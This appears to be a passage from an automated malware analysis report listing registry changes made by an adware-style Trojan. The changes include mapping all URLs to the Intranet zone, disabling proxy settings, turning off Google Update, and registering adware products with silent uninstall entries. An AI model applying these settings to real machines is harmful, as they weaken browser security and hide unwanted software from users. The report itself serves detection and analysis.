[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 45 4D 19 EE 1D E8 01 14 18 04 96 41 37 81 7C"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4820778D-AB0D-6D18-C316-52A6A0E1D507}]
"SilentUninstall" = "%Program Files%\bestadblocker\tEp7pMPAVoxXWr.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:592 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutThePrIcE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"
"InstallDate" = "20140701"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutThePrIcE\F9Kz7xj8t8M4Vo.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutThePrIcE"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 C0 A7 2F 84 63 D6 00 93 4F 6E 60 95 C8 6E CE"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Setup\6.0]
"DoNotOfferIE6AU" = "1"
"DoNotAllowIE6" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"CategoryName" = "Apps"
"NoRepair" = "1"
"ProductName" = "CutaThePrice"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"NoModify" = "1"

[HKLM\SOFTWARE\Policies\Google\Update]
"AutoUpdateCheckPeriodMinutes" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"UninstallString" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

"UpdateDefault" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"SilentUninstall" = "%Program Files%\CutaThePrice\CutaThePrice.exe /s /n /i:ExecuteCommands;UninstallCommands"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayIcon" = "%System%\msiexec.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"DisplayName" = "CutaThePrice"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 03 1F 34 56 16 EB 31 95 6F 64 32 0F 76 D4 A4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A2C98B47-B5F4-94AA-281D-4135416774CF}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Classes\TypeLib\{157B1AA6-3E5C-404A-9118-C1D91F537040}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
"(Default)" = "{7E77E9F2-D76B-4D54-B515-9A7F93DF03DF}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Policies\Google\Update]
"Update{8A69D345-D564-463C-AFF1-A69D9E530F96}" = "0"

"AutoUpdateCheckPeriodMinutes" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}]
"ap" = "-dev-multi-chrome"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Google\Update\ClientState\{8A69D345-D564-463C-AFF1-A69D9E530F96}]
"ap" = "2.0-dev-multi-chrome"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Google\Update]
"DisableAutoUpdateChecksCheckboxValue" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"SilentUninstall" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"NoRepair" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"UninstallString" = "%Program Files%\Web Protector Reliable Phishing Protection\Web Protector Reliable Phishing Protection.exe /s /n /i:ExecuteCommands;UninstallCommands"
"DisplayIcon" = "%System%\msiexec.exe"
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\1F50\temp\%original file name%.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 B5 29 E0 BD 96 28 92 29 8E B0 C9 E8 09 C8 F5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"CategoryName" = "Apps"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"InstallDate" = "20140701"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AD11DADE-C597-45D9-D8C5-1D2EB0B89613}]
"ProductName" = "Web Protector Reliable Phishing Protection"
"DisplayName" = "Web Protector Reliable Phishing Protection"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]
"(Default)" = "TinyJSObject Class"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
"(Default)" = "1.0"

[HKCU\Software\WebApp\Styles]
"MaxScriptStatements" = "4294967295"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Programmable]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\TypeLib]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\Version]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\LocalServer32]
[HKCU\Software\Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process NybbleCrawler.xyz.exe:356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c5705860" = "Vx////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"
"587b5709" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"CategoryName" = "NybbleCrawler"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"3c09c42b" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"dbaf3ce3" = "/P////%%"

[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0c230bcb" = "///%"

